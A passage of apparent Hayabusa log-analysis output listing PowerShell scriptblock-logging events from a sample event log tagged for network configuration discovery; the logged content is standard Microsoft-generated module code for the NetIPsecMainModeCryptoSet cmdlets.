[ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedType",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"s.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (c",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"dxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', 